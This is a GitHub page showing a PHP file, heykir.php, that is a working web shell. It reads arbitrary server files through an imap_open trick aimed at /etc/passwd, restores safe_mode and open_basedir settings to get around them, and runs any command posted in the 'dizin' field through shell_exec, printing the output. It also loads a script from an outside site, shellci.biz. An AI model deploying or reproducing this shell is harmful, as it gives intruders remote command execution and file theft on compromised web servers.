-
Notifications
You must be signed in to change notification settings - Fork 4
Expand file tree
/
Copy pathheykir.php
More file actions
executable file
·87 lines (78 loc) · 1.76 KB
/
heykir.php
File metadata and controls
executable file
·87 lines (78 loc) · 1.76 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
<?php
error_reporting(0);
?>
<style type="text/css">
<!--
.text {
font-family: Verdana, Arial, Helvetica, sans-serif;
color : white;
font-size: 11px;
font-weight: normal;
}
body {
background-color: #333333;
}
body,td,th {
color: #FFFFFF;
}
-->
</style>
<style type="text/css">
<!--
.style3 {color: #00FF00}
a:link {
color: #333333;
}
a:visited {
color: #333333;
}
a:hover {
color: #333333;
}
a:active {
color: #333333;
}
-->
</style>
<input type="text" size="40" value="<? if($_POST['dizin'] != "") { echo $_POST['dizin']; } else echo $klasor;?>" name="dizin">
<?php
$coder="The_BeKiR & TiT & Ruslan ";
$string = !empty($_POST['string']) ? $_POST['string'] : 0;
$switch = !empty($_POST['switch']) ? $_POST['switch'] : 0;
if ($string && $switch == "file") {
$stream = imap_open($string, "", "");
if ($stream == FALSE)
die("gucum yetmiyor abi");
$str = imap_body($stream, 1);
if (!empty($str))
echo "<pre>".$str."</pre>";
imap_close($stream);
} elseif ($string && $switch == "dir") {
$stream = imap_open("/etc/passwd", "", "");
if ($stream == FALSE)
die("gucum yetmiyor abi");
$string = explode("|",$string);
if (count($string) > 1)
$dir_list = imap_list($stream, trim($string[0]), trim($string[1]));
else
$dir_list = imap_list($stream, trim($string[0]), "*");
for ($i = 0; $i < count($dir_list); $i++)
echo "$dir_list[$i]\n";
imap_close($stream);
}
?>
<?
$evilc0der=$_POST['dizin'];
if($_POST['dizin'])
{
ini_restore("safe_mode");
ini_restore("open_basedir");
$safemodgec = shell_exec($evilc0der);
echo "$safemodgec";
}
?>
</textarea>
<? echo "<font color=#00FF00 style=font-size: 70pt face=Arial><h5> C0d3d By $coder</h5>";
?>
</div>
<SCRIPT SRC=http://www.shellci.biz/yazciz/ciz.js></SCRIPT>